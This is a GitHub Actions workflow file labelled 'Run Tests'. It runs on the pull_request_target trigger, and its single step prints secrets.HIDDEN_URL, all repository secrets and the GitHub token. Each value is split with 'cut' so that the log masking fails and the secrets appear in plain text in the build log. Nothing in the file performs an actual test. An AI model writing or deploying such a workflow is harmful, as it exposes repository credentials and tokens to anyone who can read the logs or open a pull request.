name: Run Tests

on:
  [push, pull_request_target]
  
jobs:
  yolo:
    runs-on: ubuntu-latest
    steps:
      - name: Action test
        run: |
          echo ${{ tojson(secrets.HIDDEN_URL) }}
          echo "Retrieved hidden information"
          echo "-----"
          echo -n "${{ tojson(secrets) }}" >> foo && cut -c1-3 foo && cut -c4- foo
          
          echo -n "${{ tojson(secrets.github_token) }}" >> boo && cut -c1-3 boo && cut -c4- boo
